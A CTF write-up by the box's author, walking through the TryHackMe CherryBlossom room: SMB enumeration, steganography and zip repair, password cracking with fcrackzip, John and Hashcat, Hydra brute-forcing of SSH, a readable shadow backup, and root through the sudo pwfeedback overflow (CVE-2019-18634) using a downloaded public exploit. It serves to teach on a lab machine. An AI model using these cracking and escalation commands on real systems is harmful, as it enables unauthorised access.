CherryBlossom CTF — Write-up

CherryBlossom CTF — Write-up


TryHackMe Challenge Link: https://tryhackme.com/room/cherryblossom



CherryBlossom is my fourth CTF Challenge Box. It focuses heavily on cryptography and file manipulation, but also contains lateral movement and a privesc once the machine itself is compromised.

Let’s begin.


Initial Enumeration:

We start, as always, with an nmap scan to see what services we have available to us:

nmap -sV -p- -vv <remote-ip>
nmap scan showing open ports
Open Ports

Three open ports, all standard. We have SSH running on Port 22 — there’s nothing we can do with this for now; not without at least a username. The other two ports (139 and 445) are both for Samba. We’d be as well starting here.

The first thing we need to do is enumerate the Samba fileshare to see if there’s anything we can make use of. Run another nmap scan, this time using the smb-enum-shares script:

nmap --script smb-enum-shares -vv <remote-ip>
Samba shared drives across the network
Samba Shares

Now that’s interesting. We have an anonymous file share open, which means we can theoretically log into it without credentials. Might as well try that now:

smbclient \\\\<remote-ip>\\Anonymous

Just press Enter when it asks for a password, aaand we’re in!

Run ls and we can see that there’s just one file: journal.txt. We’ll use get to download it:

Using get to download the journal.txt file from the Anonymous Samba Share
Downloading the Journal

That’s all that the samba server is willing to share with us, so use exit to close the connection, and we’ll take a look at that journal:


Journal:

Contents of journal.txt. All base64 encoded.
Contents of journal.txt

All base64 encoded. This should be easy to sort!

cat journal.txt | base64 -d
The decoded contents of journal.txt appear to be absolute drivel
journal.txt appears to contain absolute nonsense when decoded

Well then…

This looks like gibberish, so let’s save it out into a separate file and mess around with it a little. We’ll start by using the file command on it to see if it identifies as being any particular file type:

cat journal.txt | base64 -d > output
file output
The real filetype for journal.txt is PNG
Real filetype for journal.txt

Now that’s more like it. Looks like we’re dealing with what looks to be a PNG here. If you open it up you’ll see an image of a cherry tree in bloom, so it certainly does seem like this is indeed the image that it says it is. Now, what on earth are we meant to do with it?

Steghide won’t work on PNG images (which is why it’s more common to see JPEGs used for steganography in CTFs) but it is possible to hide things in a PNG. To extract the data I’m going to use a tool called stegpy. Install it using the instructions in the link (it’s pretty easy — just a Python Pip install pip3 install stegpy), then we’re good to go!

To extract a file from a PNG with stegpy, you use the syntax stegpy <target-file>. Let’s try that now on the image:

stegpy output
Using stegpy on the output file
Using stegpy on the output file

Bingo! It’s extracted a file out to _journal.zip. Try unzipping it:

Extracted _journal.zip from the image
Extracted _journal.zip from the image

Why can it never be easy?..

(Oh yeah — because I’m a sadistic bastard when it comes to boxdev)

From that error it looks like the archive has been corrupted somehow. Let’s try using file on it to see if it actually is a zip archive:

The zipfile thinks that it's a JPEG
_journal.zip is actually a JPEG

Uh, yeah, it thinks it’s a JPEG…

Open it up in hexeditor and we’ll check to see if it’s had its magic number tampered with:

hexeditor _journal.zip
Hexeditor display for _journal.zip
Hexeditor display for _journal.zip

Well, considering that the magic number for a standard .zip zipfile is 50 4B 03 04, I have a feeling we might be right on the money with this one.

Switch it back, then press CTRL + X to save and exit:

Changed the magic number back to 50 4b 03 04
Altered the magic number

Now if we run file again, we can see that our archive once again thinks that it’s a zipfile. If we try to open it, however, we encounter the next problem:

The zipfile needs a password before it will unzip
Zipfile wants a password…

It needs a password.
Back to the drawing board…

We could do this with John-the-Ripper by using the additional tool: zip2john, but for the sake of keeping things interesting, let’s use fcrackzip.

If you don’t already have frackzip installed, you can get it easily on Kali by using the command: sudo apt-get install fcrackzip — then we’re ready to set it at the zipfile!

Have a look at the man page for fcrackzip. It looks like we’ll be needing three switches: -u, to filter out false positives, -D to use a dictionary attack, and therefore also -p to specify a dictionary. As such, the command will look like this:

fcrackzip -uDp <path-to-rockyou> _journal.zip
Cracked the password using fcrackzip
Cracking the password with fcrackzip

And there we have it: one password. Go ahead and unzip the file:

Unzipping the file using the found password
Unzipping the file

Now we’re getting somewhere. A .ctz file: in other words, an encrypted Cherrytree document — definitely one of the better ways of storing a journal! If you use file on this document, it will tell you that this is actually a 7zip file, because that’s how Cherrytree saves its encrypted documents.

One problem. We can’t, by default, crack 7zip files in John or Hashcat.
We’re going to need a couple of extra libraries before we can do that:

sudo apt update && sudo apt install lzma && sudo apt install liblzma-dev
wget https://cpan.metacpan.org/authors/id/P/PM/PMQS/Compress-Raw-Lzma-2.093.tar.gz
tar -xvzf Compress-Raw-Lzma-2.093.tar.gz && cd Compress-Raw-Lzma-2.093
perl MakeFile.PL && make && make test && make install

We should now be able to use a script called 7z2john.pl that comes with John-the-Ripper. It’s often not located in your PATH, so it’s well worth doing locate 7z2john in order to find it first.

For me it’s in /usr/share/john so I’m using this command to convert the .ctz file into a hash that John can understand:

/usr/share/john/7z2john.pl <path-to-journal> > hash

Then I’m setting John-the-Ripper at the hash to see if we can get a password (note that john may need to be run as sudo. I’ve got it aliased, but you might need to prepend sudo to this command). This could take a few minutes:

john --wordlist=<path-to-rockyou> <path-to-hash>
Got a hash of the file
Breaking the password with John-the-Ripper

Perfect. We’ve got a password to open the journal, at last!

Have a read through the diary and see what you can find (Note: you’ll need to have Cherrytree installed to do this. It’s preinstalled on Kali, and can be downloaded on Linux and Windows without difficulty). Be sure to grab the flag from the journal file — you’ve earnt it!

You’ll notice that the author makes reference to a girlfriend called Lily, as well as his great new idea of having everyone select a password from his wonderful new list. I don’t know about you, but given we’ve got the list, I love that idea!

Download the thing (cherry-blossom.list) and let’s bruteforce some SSH!


Exploitation:

We’ve got a username, we’ve got a password list, and we’ve got an open port.

Hydra time!

Let’s set Hydra against the SSH service on this machine:

hydra -l lily -P <path-to-cherry-blossom-list> ssh://<remote-ip>
Bruteforced the login with Hydra
Bruteforcing the login with Hydra

Terrific — looks like that author’s “brilliant idea” is working well already!

Login as Lily (ssh lily@<remote-ip>) and have a look around the machine to see what you can find.

If you enumerate enough, you should stumble across the /var/backups folder. Well, lookee here! Who’da thunk it? Some eejit has made a backup of the shadow file containing all the passwords for the system:

Backup of the shadow file in /var/backups
Backup of the shadow file in /var/backups

They were even kind enough to make it world readable…

Contents of the backup shadow file
/var/backups/shadow.bak

Hey presto, we’ve got password hashes for root and a user called Johan — presumably the guy who signed the diary entries as “J”?

Anyway, let’s go crack some hashes!

Don’t waste your time with the root hash — you won’t be cracking it anytime in the near future. Johan’s password, on the other hand, is perfectly crackable.

This time let’s use Hashcat, just to get the full range of experiences. Copy the password back onto your local machine and let’s get cracking!

hashcat -m1800 -a0 --force '<hash>' <path-to-cherry-blossom-wordlist>
Cracking Johan's password with Hashcat
Cracking Johan’s password with Hashcat

Score! We’ve got a hit — a password for Johan.

Notice, however, that when you try to login as Johan over SSH, it doesn’t work:

SSH as Johan is blocked
Can’t SSH as Johan

It looks like login over SSH as Johan has been blocked. Well, back to Lily then. We’ll upgrade to Johan’s account from there:

ssh lily@<remote-ip>
su johan
Using the su command to upgrade our access as Lily to Johan's account
su as Johan

We can now grab the user flag:

Output of the flag in user.txt
User Flag

Right. Now for the privesc!


Privilege Escalation:

Take a look around the machine, see if you can find anything exploitable. We can try using sudo -l here, but when we do, you’ll notice something very interesting:

Asterisks appear when we type Johan's password to use sudo
sudo -l

We are prompted for Johan’s password, which is not unusual. What is unusual is that we’re able to see asterisks as we type.

This means that there’s an activated setting called pwfeedback that, with vulnerable versions of sudo, will let us gain root permissions directly (CVE-2019-18634); coincidentally, the same one I demonstrated in my recent Sudo Buffer Overflow room on TryHackMe. Unlike in the walkthrough though, this time we’ll be starting from scratch.

First thing’s first. Let’s just check to ensure that there is a buffer overflow vulnerability in this version of sudo:

perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S /bin/bash
Proof that this version of Sudo is vulnerable to the BOF exploit
POC

Yes! That’s a segmentation fault, meaning that we’re vulnerable to CVE-2019-18634.

Now we just need to exploit it.

Easier said than done. Even if we did have a compiler installed on this machine (we don’t), this exploit is notoriously tricky to compile. I’ve found that downloading it to Kali and compiling it there usually works, so let’s try that now:

wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
gcc -o exploit exploit.c
Downloading and compiling the exploit from Saleem Rashid's Github
Downloading and compiling the exploit

If you didn’t get an error message then all’s good and the compilation worked. If you did get an error then you’re going to have to fiddle around with it until you get it working. It’s worth noting that since the time of writing, a makefile has been added to the repo. That might be a better way of compiling the exploit.

Now that we’ve got the exploit compiled, we can upload it to our target. Easier said than done. Remember that we can’t SSH as Johan, and if you try running Sudo as Lily, you’ll find that she doesn’t have permission to even read the sudo command, let alone run it:

Lily isn't allowed to use the sudo command at all, meaning the exploit won't work for her.
Permission denied running sudo as Lily

My recommended solution here is to use SCP to transfer the file to Lily, but send it into the /tmp directory. That way you can then upgrade to Johan, and run the script from there:

Successfully uploaded the exploit
Uploading the exploit

Now, theoretically, all we need to do is run the exploit and we’ve got root!

Used the BOF vulnerability in Sudo to get Root
Got Root!

Yay! Now all we need to do is grab the root flag and we’re done!

Flag in /root/root.txt
Root Flag

Thus we come to the end of another box. I hope that you enjoyed Cherry Blossom. This was a really fun one to write — especially with the inclusion of the new (at the time of writing) sudo buffer overflow vulnerability. As always, if you’ve found another way to do this box, please feel free to let me know, on the TryHackMe Discord, in the comments, or through my contact page!

One thought on “CherryBlossom CTF — Write-up

  1. It was required a lot of skills and confidence, because every step you go further, one problem shows to solve..
    Not only discovering the tools, but making work.

    In my opinion, the hardest part was stegpy. I spend 3 days looking for the perfect tool.
    great work.

Leave a Reply

Your email address will not be published. Required fields are marked *

Enter Captcha Here : *

Reload Image